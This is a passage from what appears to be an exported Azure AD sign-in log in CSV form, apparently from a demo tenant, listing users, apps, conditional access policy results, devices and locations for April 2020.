'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 15:24,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",d57fb780-1a14-4a75-9a44-f6b097591300,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office365 Shell WCSS-Server,d57fb780-1a14-4a75-9a44-f6b097591300,SigninLogs,Sucess,50.6406517,5.572050095
+119,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,42:35.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,207e4bb7-2b2b-43e3-a1a2-ce42acd69911,Microsoft.aadiam,Microsoft.aadiam,,CBServiceAccount,4,US,Azure Active Directory PowerShell,1b730954-1685-4b74-9bfd-dac224a7b894,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 15:42,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Rich Client 3.19.7.16602'}",58101571-c323-4e3c-9694-0b124e201200,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.17196655273438, 'latitude': 38.73078155517578}, 'state': 'Virginia', 'city': 'Washington'}",none,none,none,none,[],{'errorCode': 0},CBServiceAccount,ba008280-608e-4a2d-b693-19957e50c691,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,58101571-c323-4e3c-9694-0b124e201200,SigninLogs,Sucess,38.73078156,-78.17196655
+120,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,34:12.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,8259ca4c-d647-4346-9fde-b08ac38d6032,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 16:34,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",178eb907-c36d-4662-9369-da0259b01400,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,,178eb907-c36d-4662-9369-da0259b01400,SigninLogs,Sucess,33.7984581,-84.38828278
+121,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,44:01.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,a2cd469f-d04f-0000-5421-7b98b2db0309,Microsoft.aadiam,Microsoft.aadiam,,Brandon,4,US,Office 365 SharePoint Online,00000003-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 16:44,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",f0d90a71-c139-4edc-9002-2dd7245f1400,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Brandon,9dadd76f-3237-4e1d-84e7-e45c59867492,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,f0d90a71-c139-4edc-9002-2dd7245f1400,SigninLogs,Sucess,41.90428925,-85.99833679
+122,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,01:50.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,49d72ea1-2ef0-4a27-9a59-fcb12a0faca5,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 12:01,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",b125da47-83a8-4791-90e4-983baa2c0a00,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office365 Shell WCSS-Server,b125da47-83a8-4791-90e4-983baa2c0a00,SigninLogs,Sucess,50.6406517,5.572050095
+123,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,51:36.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,29abca64-1454-4194-b893-834e4922701a,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",notApplied,09/04/2020 19:51,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",f22e123a-cab3-4cb1-81e0-9a3b33012200,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,f22e123a-cab3-4cb1-81e0-9a3b33012200,SigninLogs,Sucess,36.6404686,-78.26995087
+124,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,32:30.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,00a87cc7-7d52-4fbc-9b05-fa4a2cd018e6,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 16:32,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",1dbd81fd-18f7-4582-ba72-d8f24f521600,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,1dbd81fd-18f7-4582-ba72-d8f24f521600,SigninLogs,Sucess,41.90428925,-85.99833679
+125,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,37:07.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,169892fb-8bed-4a71-9ded-eb0a44d35d16,Microsoft.aadiam,Microsoft.aadiam,,Jordan Ross,4,US,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 21:37,"{'operatingSystem': 'Windows 10', 'deviceId': '16377263-6c6e-4b1f-8679-1902a5731dc6', 'browser': 'Edge 81.0.416', 'displayName': 'MININT-E8D2OM5', 'isCompliant': True, 'trustType': 'Hybrid Azure AD joined', 'isManaged': True}",212014b7-1db5-4fa5-9002-28e53ce90200,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -122.16507720947266, 'latitude': 47.061771392822266}, 'state': 'Washington', 'city': 'Orting'}",none,none,none,none,[],{'errorCode': 0},Jordan Ross,d333c1f2-e2a3-4f8f-8370-35c29b543c62,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,212014b7-1db5-4fa5-9002-28e53ce90200,SigninLogs,Sucess,47.06177139,-122.1650772
+126,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,24:00.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,ad7e45db-77a8-4cb5-8947-61466c81c004,Microsoft.aadiam,Microsoft.aadiam,,Brandon,4,US,SharePoint Online Web Client Extensibility,08e18876-6177-487e-b8b5-cf950c1e598c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': 